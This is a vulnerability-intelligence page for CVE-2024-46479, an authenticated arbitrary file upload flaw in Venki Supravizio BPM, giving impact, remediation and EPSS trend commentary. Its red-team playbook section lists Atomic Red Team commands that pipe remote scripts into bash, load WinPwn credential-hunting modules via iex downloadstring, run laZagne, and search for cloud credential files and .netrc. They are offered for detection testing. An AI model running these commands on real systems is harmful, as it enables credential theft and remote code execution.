CVE-2024-46479
Overview
The vulnerability is an arbitrary file upload flaw rooted in insufficient validation of user-supplied files within the Venki Supravizio BPM application. This weakness arises from improper handling of file upload mechanisms in the authenticated user interface, allowing crafted files to bypass security controls. The affected component is the file upload functionality present in versions through 18.0.1, which lacks adequate restrictions on file type and content verification.
Vulnerability Description
Venki Supravizio BPM through 18.0.1 was discovered to contain an arbitrary file upload vulnerability. An authenticated attacker may upload a malicious file, leading to remote code execution.
Impact
An authenticated attacker can leverage this vulnerability to upload and execute arbitrary code on the server hosting Venki Supravizio BPM, resulting in full system compromise. The attacker must have valid user credentials (low privilege) but does not require additional user interaction. Exploitation can lead to unauthorized data access, service disruption, and lateral movement within the network. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) indicates network attack with low complexity and privileges, no user interaction, and complete impact on confidentiality, integrity, and availability.
Solution
Venki recommends upgrading to version 18.0.2 or later, which includes patches addressing the arbitrary file upload vulnerability. Detailed remediation steps and patch downloads are available on the official vendor advisory page at https://www.venki.com.br/ferramenta-bpm/supravizio/. Users should apply the vendor-supplied updates promptly and verify that file upload validation controls are enforced as per the advisory instructions documented in the linked GitHub research repository.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Venki Supravizio BPM versions up to 18.0.1 allows for arbitrary file uploads, which can be exploited by authenticated attackers. This flaw arises from insufficient validation of file types and content during the upload process. Attackers can leverage this weakness to upload malicious files, such as web shells or executables, which can then be executed on the server. The lack of stringent checks means that attackers can bypass security measures that are typically in place to prevent unauthorized file types from being uploaded, thereby opening a pathway for remote code execution.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated user, who may have legitimate access to the application, can exploit the flaw by uploading a crafted file that contains malicious code. Once the file is uploaded, the attacker can trigger the execution of this code, leading to a potential takeover of the server. Scenarios may include uploading a PHP or JSP web shell that allows the attacker to execute arbitrary commands, manipulate data, or pivot to other systems within the network. This type of attack not only compromises the integrity of the affected system but can also lead to lateral movement within the organization’s infrastructure.
The real-world impact of such a vulnerability is significant, especially for organizations relying on Venki Supravizio BPM for business processes. The potential for remote code execution poses a critical business risk, as it can lead to data breaches, loss of sensitive information, and disruption of services. Organizations may face reputational damage, legal liabilities, and financial losses due to downtime or recovery efforts. Furthermore, the exploitation of this vulnerability could provide attackers with a foothold within the network, enabling them to conduct further attacks or exfiltrate data, thereby amplifying the overall risk to the organization.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, it is essential to conduct regular security assessments and penetration testing to identify and remediate vulnerabilities in the application. Implementing robust file validation mechanisms is crucial; this includes checking file extensions, MIME types, and content inspection to ensure that only safe files are uploaded. Additionally, organizations should employ web application firewalls (WAF) to monitor and filter incoming traffic, which can help detect and block malicious file uploads. Regularly updating the application to the latest version and applying security patches is also vital to protect against known vulnerabilities.
In conclusion, the arbitrary file upload vulnerability in Venki Supravizio BPM presents a serious threat that can lead to remote code execution if exploited. The potential for significant business impact necessitates immediate attention from organizations using this software. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems and reduce the risk associated with this vulnerability, ensuring the integrity and security of their operations.
CSURFACE threat intelligence has identified a measurable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-46479, reflecting a growing likelihood of exploitation attempts targeting the arbitrary file upload vulnerability in Venki Supravizio BPM. Although no new exploit techniques or active campaigns have been detected by our telemetry, the upward trend in EPSS—now approaching the 91st percentile—signals heightened attacker interest and potential preparatory activity within underground forums or testing environments. This shift underscores an elevated risk posture for organizations running affected versions, as the vulnerability’s exploitability appears to be gaining momentum. Defenders should interpret this as an early warning that exploitation may become more frequent or sophisticated, increasing the urgency for vigilant monitoring and incident readiness. While the absence of confirmed exploit deployments tempers immediate alarm, the sustained rise in predictive scoring warrants continued attention to evolving threat dynamics surrounding this high-severity flaw.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Venki | Supravizio Bpm | All |
cpe:2.3:a:venki:supravizio_bpm:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-46479 |
| github.com |
GitHub CVE
|
https://github.com/Lorenzo-de-Sa/Vulnerability-Research |
| venki.com.br |
GitHub CVE
|
https://www.venki.com.br/ferramenta-bpm/supravizio/ |
| github.com |
GitHub CVE
|
https://github.com/Lorenzo-de-Sa/Vulnerability-Research/blob/main/CVE-2024-46479.md |